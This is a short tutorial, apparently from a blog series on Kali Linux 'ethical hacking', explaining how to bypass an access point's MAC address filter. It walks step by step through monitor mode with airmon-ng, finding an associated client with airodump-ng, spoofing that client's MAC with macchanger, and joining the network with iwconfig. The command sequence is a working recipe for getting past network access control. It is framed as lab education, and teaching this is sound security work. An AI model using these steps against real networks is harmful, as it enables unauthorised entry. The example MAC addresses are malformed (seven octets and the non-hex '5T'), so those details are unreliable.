Ethical Hacking with Kali Linux - Part 3: Bypassing the MAC Address Filter
>> Welcome all, to this series of Kali Linux for Ethical Hacking. This is third part and I'll explain process of bypassing the MAC Address Filter on an AP (Access Point).
# 3 Basic Process:
- Finding the AP: airmon-ng & airodump-ng
- Finding an associated client: airodump-ng
- Finally, using the MACchanger
# . . . Let's Begin
- Before starting, make sure that you have eth0, lo, wlan0 in action. (Go to terminal and run ifconfig.)- Let's start to monitor on the wireless interface. Run:
airmon-ng start wlan0
- After executing above command, we must get new interface mon0 (Monitor mode enabled.)- Verify that both interfaces are up and running, run:
airmon-ng
- Watch for wlan0 and mon0, run:
airodump-ng mon0
- For monitoring all the APs that Kali Linux OS can find out.- In the next step, you'll get BSSID and ESSID, channel, cipher. If there's any hidden SSID, then ESSID will be formatted like this: <length: 0> or with no SSID.Note: We saw in second part how to uncover this hidden SSID. But, here you can use any SSID with Open Encryption, or SSID with known password.- We will use the MAC address that was seen in part 2. i.e. 00:A1:B2:11:20:13:5T and channel '1' (Assume the MAC address filter is done in this system. Let's suppose it's SSID is nhc-BJ.)- Now, we try to find out the client and his MAC associated with this AP (nhc-BJ).- So we can use that MAC to bypass filter, run:
airodump-ng -c 1 -a --bssid 00:A1:B2:11:20:13:5T mon0
(-c is for channel, channel is 1 for BSSID; we're are trying to connect. -a is for showing only the client associated with this BSSID.)- You'll get the MAC address with the station associated with that AP, and this is the client's station. (Let's assume Mac = 00:C1:52:11:20:13:7D).- CTRL+C (press)- Run:
macchanger --help(notice, -m for setting mac)
-Run:
macchanger -m 00:C1:52:11:20:13:7D wlan0
(If the device or resource busy, then run following command:)
airmon-ng stop wlan0
- Run:
macchanger -m 00:C1:52:11:20:13:7D wlan0
(If successful, you'll see a message like 'faked MAC')-Run:
ifconfig wlan0 down
ifconfig wlan0 up
(Let's see whether we can associate with the SSID now or not with this faked MAC)- Run:
iwconfig wlan0 essid nhc-BJ channel 1
(If not, run in Kali and run it in BackTrack. Or, see the updated version of Kali.)
iwconfig wlan0
(If successful, the Access Point will be associated.)
A quick note: This series is only for educational purpose. Practice this series in a lab, in a virtual/separate network and always avoid illegal activities. If you can, then support us in fighting the bad guys.
See the other posts in this series:
Ethical Hacking with Kali Linux – Part 1: Objective
Ethical Hacking with Kali Linux - Part 2: Finding Hidden SSIDS
Ethical Hacking with Kali Linux - Part 4: Breaking WPA2 Wireless
Ethical Hacking with Kali Linux - Part5: Rogue Wireless Access Points
Ethical Hacking with Kali Linux – Part 6: Nmap (Network Mapper)
By: BIJAY ACHARYA (twitter : @acharya_bijay)